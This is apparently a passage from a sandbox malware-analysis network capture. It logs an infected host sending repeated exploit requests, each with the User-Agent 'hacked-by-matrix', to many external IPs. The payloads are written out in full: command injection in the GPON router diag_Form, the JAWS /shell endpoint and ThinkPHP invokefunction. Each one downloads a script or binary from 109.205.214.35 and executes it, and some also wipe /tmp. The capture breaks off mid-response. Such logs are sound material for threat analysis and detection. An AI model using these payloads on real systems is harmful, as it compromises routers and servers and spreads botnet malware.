                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        601192.168.2.135141642.160.45.139443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598607063 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        602192.168.2.1359636109.116.33.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598643064 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        603192.168.2.134356842.234.90.111443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598670006 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        604192.168.2.1342188212.225.134.153443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598674059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        605192.168.2.1353720118.91.70.176443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598674059 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        606192.168.2.1358814109.161.31.151443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598750114 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        607192.168.2.1360296212.48.56.216443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598751068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        608192.168.2.133492042.23.129.250443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598751068 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        609192.168.2.1338736212.138.18.62443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598761082 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        610192.168.2.1345638109.248.141.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.598788023 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        611192.168.2.1337854136.183.8.21780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.781846046 CET259OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:41.885946035 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:41 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>
                                                        Mar 21, 2024 05:22:42.190962076 CET490INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Thu, 21 Mar 2024 04:22:41 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        612192.168.2.134177295.179.237.5880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:41.864456892 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:22:42.022780895 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:41 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        613192.168.2.1354978162.212.171.6180
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.090121031 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:42.296039104 CET470INHTTP/1.1 404 Not Found
                                                        Date: Thu, 21 Mar 2024 04:22:42 GMT
                                                        Server: Apache/2.2.15 (CentOS)
                                                        Content-Length: 278
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 68 65 6c 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 32 2e 31 35 20 28 43 65 6e 74 4f 53 29 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /shell was not found on this server.</p><hr><address>Apache/2.2.15 (CentOS) Server at 127.0.0.1 Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        614192.168.2.1346008112.187.241.4980
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.324157000 CET325OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://109.205.214.35/x86 -O /tmp/.matrix; chmod 777 /tmp/.matrix; /tmp/.matrix thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        615192.168.2.1343244133.130.69.20780
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.375262022 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.822762012 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:44.100687981 CET467INHTTP/1.1 400 Bad Request
                                                        Date: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Server: Apache
                                                        Content-Length: 289
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 6d 6f 72 6f 6d 69 2d 65 78 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at moromi-ex.com Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        616192.168.2.1336612118.27.33.21880
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.375292063 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.263885975 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.542979956 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:22:43 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        617192.168.2.133867218.160.211.4080
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:22:42.807040930 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.146364927 CET271OUTGET /shell?cd+/tmp;rm+-rf+*;wget+ 109.205.214.35/arm;chmod+777+/tmp/arm;sh+/tmp/arm4 jawsHTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Host: 127.0.0.1:80
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                                        Connection: keep-alive
                                                        Mar 21, 2024 05:22:43.264266968 CET927INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
